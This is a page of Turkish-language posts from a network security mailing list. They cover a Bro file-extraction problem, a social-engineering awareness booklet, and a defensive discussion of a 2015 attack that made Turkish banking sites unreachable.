www.netsectr.org

---

Re: [NetSec] Bro - File Extraction

[Mustafa TURAN]

Merhaba Mehmet Bey,

NIST_SP1800-5_FSITAM dokümanı, NIST SPECIAL PUBLICATION 1800-5c (3. PDF
dosyası) nın 3.3 maddesinde detaylarını bulabilirsiniz...

Syg.

MT



Saygilarimla,

Mustafa TURAN

2016-05-11 13:07 GMT+03:00 Mehmet LEBLEBİCİ <mehmet_...@hotmail.com>:

> Merhabalar,
>
> Bro ile file extraction yapmaya çalışıyorum. 2.4.1 sürümünün kendi
> extract-all-files scriptini kullanıyorum ama dosyaları eksik extract
> ediyor. Değişken bir noktaya kadar extract ediyor gerisini almıyor.
> files.log dosyasında da seen_bytes ile total_bytes alanları örtüşmüyor.
> Extract file limit size ını da artırdım, fakat onunla da alakası yok. Bir
> de tcpdump ile pcap dosyası kaydedip, manuel olarak bro -Cr komutuyla yine
> aynı bro scriptini çalıştırdığımda dosyaları düzgün olarak extract ediyor.
> Bu sorunun kaynağı ne olabilir, nasıl çözebilirim, yardımcı olabilirseniz
> çok sevinirim.
>
> Teşekkürler,
>
> Mehmet Leblebici
>
> ---
> Uygulamalı Ağ Güvenliği Eğitimi
>
> 06-08 Mayıs 2016 - ISTANBUL
>
> ---
>
---
Uygulamalı Ağ Güvenliği Eğitimi

06-08 Mayıs 2016 - ISTANBUL

---

Re: [NetSec] Sosyal Mühendislik Saldırıları

[Mustafa TURAN]

Merhaba,

PLASTIC isimli ve gerçek bir hikayeden alıntı bu filmi izlemenizi tavsiye
ederim, sosyal mühendislik ile insanlardan nasıl bilgi alındığına şahit
olabilirsiniz.


http://www.imdb.com/title/tt2556874/


Saygılarımla.

MT




Saygilarimla,

Mustafa TURAN

2016-02-08 9:20 GMT+02:00 Alper Basaran <basaranal...@gmail.com>:

> Merhaba,
>
> Sosyal mühendislik saldırılarıyla ilgili hazırladığımız bir kitapçığı
> paylaşmak istiyorum.
> http://www.slideshare.net/AlperBasaran/sosyal-muhendislik-saldrlar
>
> Saygılarımla,
> Alper Başaran
> ---
> APT ve Phishing (Oltalama) Saldırılarına Karşı Kurumsal Güvenlik
> Farkındalığınızı Arttırın - SinaraLabs
>
> http://www.sinaralabs.com
>
> ---
---
APT ve Phishing (Oltalama) Saldırılarına Karşı Kurumsal Güvenlik 
Farkındalığınızı Arttırın - SinaraLabs

http://www.sinaralabs.com

---

Re: [NetSec] Bankalara Saldırı

[Mustafa TURAN]

Merhaba,

Ziraat Bankası bir tür IP white list uyguluyor, varsayılan olarak sadece
Türkiye'ye ait IP adreslerinden giriş yapabiliyorsunuz, diğer adresler
otomatik olarak engellenmiş durumda ta ki siz özel istek ile yurtdışına ait
IP adresinize izin alana kadar.. Yaklaşık 3 yıl kadar önce tesadüf eseri
öğrenmiştim. Diğer kamu bankaları da bu tür bir önlem almış olabilir.

Saldırıya ait tüm verilerin bir araya getirilerek uzun bir araştırma ile
her yönünün ortaya konması gelecek için faydalı olacaktır, Lessons Learned
olmazsa her seferinde aynı oyunu farklı seyirciler izleyecektir. Aramızda
yetkili veya öncü olabilecek yerlerde olan kişiler veya onlara erişebilen
arkadaşlar varsa bu konuyu da gündeme getirmeniz ülkemiz adına faydalı
olacaktır.

Süphesiz bu olaylar toplumun tüm kesimlerinde Bilgi Güvenliği / Siber
Güvenlik konusunda bir farkındalık artışı yaratacaktır. Konu trend olunca,
hakkında bilgisi olmayan birçok kişi de ortaya çıkarak bilgi kirliliğine
sebep olabilir. Konuyu toplumun anlayabileceği bir sadeliğe getirerek
jargon kullanmadan anlatmak toplumsal bilincin artmasında faydalı olacaktır.

Bir anlamda gerçek Siber Savaş öncesi bir tatbikat gibi oldu Türkiye için,
zayıf ve güçlü yönlerimizi farketmemizi sağlayacak ve bizi geliştireceğine
inanıyorum. Bizlere düşen görev konuyu üst mercilere/karar vericilere iyi
bir şekilde aktarmak ve yönetim desteği ile yapılarımızı (People, Process &
Technology) kuvvetlendirmek için bir yol haritası çizmek olmalıdır.
Çalışmalarımızın geri dönüşleri 1-2 yılı bulabilir.

Hepimize kolay gelsin diyor başarılar diliyorum arkadaşlar.

Saygılarımla,

Mustafa TURAN





Saygilarimla,

Mustafa TURAN

2015-12-24 18:09 GMT+02:00 Kemal Bozdağ <kema...@gmail.com>:

> Akbank ve garanti şu açılmıyor
>
> Hayret, halk ve ziraat gibi devlet bankaları hala ayakta.. özrl sermayeli
> yerli bankaları mı hedef almışlar.. çok ilginç
> Bu bankların yurtdışında fazla müşterisi olmaz. Nic.tr olayınfa olduğu
> gibi Yapılacak en iyi şey turk telekomun diğer otonom sistemlere yeni bgp
> anonsları gönderip,  bu banka ip adreslerine ulaşımı engellemesi lazım..
> yoksa trafik durana kadar rahat edemezler
> 24 Ara 2015 17:38 tarihinde "Levent" <leoz...@gmail.com> yazdı:
>
>> Arkadaşlar
>> Garanti bankasının dahil olduğu bazı Türk bankalarına erişilemiyor. Olası
>> yeni bir atak olma durumu var. Bilginize
>>
>> ---
>> Ağ ve Güvenlik Yöneticileri İçin Linux Eğitimi - İSTANBUL
>>
>> 15-17 Ocak 2016
>>
>> ---
>>
>
> ---
> Ağ ve Güvenlik Yöneticileri İçin Linux Eğitimi - İSTANBUL
>
> 15-17 Ocak 2016
>
> ---
>
---
Ağ ve Güvenlik Yöneticileri İçin Linux Eğitimi - İSTANBUL

15-17 Ocak 2016

---